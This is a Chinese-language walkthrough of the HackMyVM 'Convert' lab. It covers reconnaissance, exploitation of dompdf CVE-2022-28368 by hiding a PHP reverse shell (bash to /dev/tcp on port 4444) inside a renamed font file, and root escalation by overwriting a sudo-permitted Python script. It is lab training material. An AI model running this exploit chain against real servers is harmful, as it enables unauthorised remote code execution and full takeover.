HakcMyVM-Convert

信息搜集

主机发现

复制代码
┌──(kali㉿kali)-[~]
└─$ nmap -sn 192.168.21.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-24 02:18 EDT

Nmap scan report for 192.168.21.6
Host is up (0.00046s latency).
MAC Address: 08:00:27:E7:D5:88 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.21.7
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 2.77 seconds

端口扫描

复制代码
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p- 192.168.21.6
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-24 02:19 EDT
Nmap scan report for 192.168.21.6
Host is up (0.00041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
80/tcp open  http    nginx 1.22.1
MAC Address: 08:00:27:E7:D5:88 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.74 seconds

漏洞利用

看一下80端口,HTML-to-PDF转换器

目录枚举

复制代码
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git -u http://192.168.21.6
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.21.6
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt,jpg,png,zip,git
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 1026]
/upload               (Status: 301) [Size: 169] [--> http://192.168.21.6/upload/]                                                         
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================

尝试文件包含,但是没有成功

看了一下,好像是CVE-2022-28368

寻找一个.ttf字体文件,将其改为.php文件,并添加上shell

复制代码
┌──(kali㉿kali)-[~]
└─$ find / -name "*.ttf" 2>/dev/null
┌──(kali㉿kali)-[~]
└─$ cp /usr/lib/gophish/static/font/fontawesome-webfont.ttf ./exp.php
┌──(kali㉿kali)-[~]
└─$ echo '<?php system("bash -c '\''bash -i >& /dev/tcp/192.168.21.7/4444 0>&1'\''"); ?>' >> ./exp.php

在创建一个css文件

复制代码
┌──(kali㉿kali)-[~]
└─$ cat exp.css  
@font-face {
    font-family: 'exp';
    src: url('http://192.168.21.7:8080/exp.php');
    font-weight: 'normal';
    font-style: 'normal';
}

在创建一个html文件,借此来触发

复制代码
┌──(kali㉿kali)-[~]
└─$ cat exp.html 
<!DOCTYPE html>
<html>
<head>
    <link rel="stylesheet" href="http://192.168.21.7:8080/exp.css">
</head>
<body>
    <div style="font-family: 'exp';">
        New Font...
    </div>
</body>
</html>

开始利用

复制代码
┌──(kali㉿kali)-[~]
└─$ python -m http.server 8080
网页触发:http://192.168.21.7:8080/exp.html

成功触发

192.168.21.6 - - [24/Apr/2026 04:11:08] "GET /exp.html HTTP/1.1" 200 -
192.168.21.6 - - [24/Apr/2026 04:11:08] "GET /exp.css HTTP/1.1" 200 -
192.168.21.6 - - [24/Apr/2026 04:11:08] "GET /exp.php HTTP/1.1" 200 -

缓存文件名是基于字体名、样式、权重和MD5哈希生成的,格式为:<字体族名>_<字体样式>_<md5哈希值>.php,计算一下MD5是多少

┌──(kali㉿kali)-\~

└─$ echo -n "http://192.168.21.7:8080/exp.php" | md5sum

12c572ccb65e130e206986e53354e0af -

复制代码
通常缓存在/vendor/dompdf/dompdf/lib/fonts/目录下,尝试触发

┌──(kali㉿kali)-\~

└─$ curl "http://192.168.21.6/dompdf/lib/fonts/exp_normal_12c572ccb65e130e206986e53354e0af.php"

Warning: Binary output can mess up your terminal. Use "--output -"

Warning: to tell curl to output it to your terminal anyway, or

Warning: consider "--output " to save to a file.

┌──(kali㉿kali)-\~

└─$ nc -lvnp 4444

listening on any 4444 ...

connect to 192.168.21.7 from (UNKNOWN) 192.168.21.6 41868

bash: cannot set terminal process group (484): Inappropriate ioctl for device

bash: no job control in this shell

eva@convert:/var/www/html/dompdf/lib/fonts$ id

id

uid=1000(eva) gid=1000(eva) groups=1000(eva)

复制代码
# 权限提升

eva@convert:/var/www/html$ sudo -l

sudo -l

Matching Defaults entries for eva on convert:

env_reset, mail_badpass,

secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin,

use_pty

User eva may run the following commands on convert:

(ALL : ALL) NOPASSWD: /usr/bin/python3 /home/eva/pdfgen.py *

//我们在eva目录下拥有写的权限

eva@convert:/var/www/html$ cat /home/eva/pdfgen.py

cat /home/eva/pdfgen.py

from os import path

from time import time

from weasyprint import HTML, CSS

from urllib.parse import urlparse

from argparse import ArgumentParser

from logging import basicConfig, INFO, error, info, exception

def prune_log(log_file, max_size=1):

try:

log_size = path.getsize(log_file) / (1024 * 1024)

if log_size > max_size:

with open(log_file, 'w'):

pass

info(f"Log file pruned. Size exceeded {max_size} MB.")

print(f"Log file pruned. Size exceeded {max_size} MB.")

except Exception as e:

print(f"Error pruning log file: {e}")

log_file = '/home/eva/pdf_gen.log'

prune_log(log_file)

basicConfig(level=INFO, filename=log_file, filemode='a',

format='%(asctime)s - %(levelname)s - %(message)s')

def is_path_allowed(output_path):

blocked_directories = "/root", "/etc"

for directory in blocked_directories:

if output_path.startswith(directory):

return False

return True

def url_html_to_pdf(url, output_path):

block_schemes = "file", "data"

block_hosts = "127.0.0.1", "localhost"

blocked_directories = "/root", "/etc"

复制代码
try:
    start_time = time()

    scheme = urlparse(url).scheme
    hostname = urlparse(url).hostname

    if scheme in block_schemes:
        error(f"{scheme} scheme is Blocked")
        print(f"Error: {scheme} scheme is Blocked")
        return

    if hostname in block_hosts:
        error(f"{hostname} hostname is Blocked")
        print(f"Error: {hostname} hostname is Blocked")
        return

    if not is_path_allowed(output_path):
        error(f"Output path is not allowed in {blocked_directories} directories")
        print(f"Error: Output path is not allowed in {blocked_directories} directories")
        return

    html = HTML(url.strip())
    html.write_pdf(output_path, stylesheets=[CSS(string='@page { size: A3; margin: 1cm }')])

    end_time = time()
    elapsed_time = end_time - start_time
    info(f"PDF generated successfully at {output_path} in {elapsed_time:.2f} seconds")
    print(f"PDF generated successfully at {output_path} in {elapsed_time:.2f} seconds")

except Exception as e:
    exception(f"Error: {e}")
    print(f"Error: {e}")

if name == "main ":

parser = ArgumentParser(description="Convert HTML content from a URL to a PDF file.")

parser.add_argument("-U", "--url", help="URL of the HTML content to convert", required=True)

parser.add_argument("-O", "--out", help="Output file path for the generated PDF", default="/home/eva/output.pdf")

复制代码
args = parser.parse_args()
url_html_to_pdf(args.url, args.out)

//创建一个恶意文件

eva@convert:/var/www/html$ echo 'import os; os.system("/bin/bash")' > /home/eva/exp.py

<port os; os.system("/bin/bash")' > /home/eva/exp.py

//将其把原来的文件替换掉

eva@convert:/var/www/html$ mv /home/eva/exp.py /home/eva/pdfgen.py

mv /home/eva/exp.py /home/eva/pdfgen.py

//以root的身份执行我们的脚本,pwned没任何作用,只是为了符合带参数条件

eva@convert:/var/www/html$ sudo /usr/bin/python3 /home/eva/pdfgen.py pwned

sudo /usr/bin/python3 /home/eva/pdfgen.py pwned

id

uid=0(root) gid=0(root) groups=0(root)

复制代码
相关推荐
Fnetlink122 分钟前
Fnet 云网安 260717
网络·安全·网络安全
txg6663 小时前
Agent 攻击 Agent:自动检测 LLM Agent 中的污点式漏洞
人工智能·深度学习·安全·网络安全
2501_9151063216 小时前
TraceEagle 代理抓包教程 本机和手机的 HTTPS 抓包方法
网络协议·计算机网络·网络安全·ios·adb·https·udp
Chockmans1 天前
春秋云境CVE-2023-51385(保姆级教学)
大数据·web安全·elasticsearch·搜索引擎·网络安全·春秋云境·cve-2023-51385
ICT系统集成阿祥1 天前
WAF部署方式对比(主流5种:透明桥、反向代理、旁路镜像、串接路由、云WAF)
网络安全·waf·部署模式
清欢渡---1 天前
HCIP-第五章vrrp
网络·网络安全·hcip
m0_738120722 天前
AI安全实战系列(二):Lab01 Foundations和Lab02 Prompt Injection
linux·运维·人工智能·安全·网络安全·系统安全
小小小小钰儿2 天前
网络安全名词术语!
安全·web安全·计算机·网络安全·黑客·编程
数据知道2 天前
BGP 劫持是怎么回事?运营商级路由安全科普
网络·安全·网络安全·智能路由器·bgp劫持
m0_738120722 天前
AI安全实战系列(四):Lab04 Multi-Agent——多智能体攻击分析
服务器·开发语言·人工智能·安全·网络安全·语言模型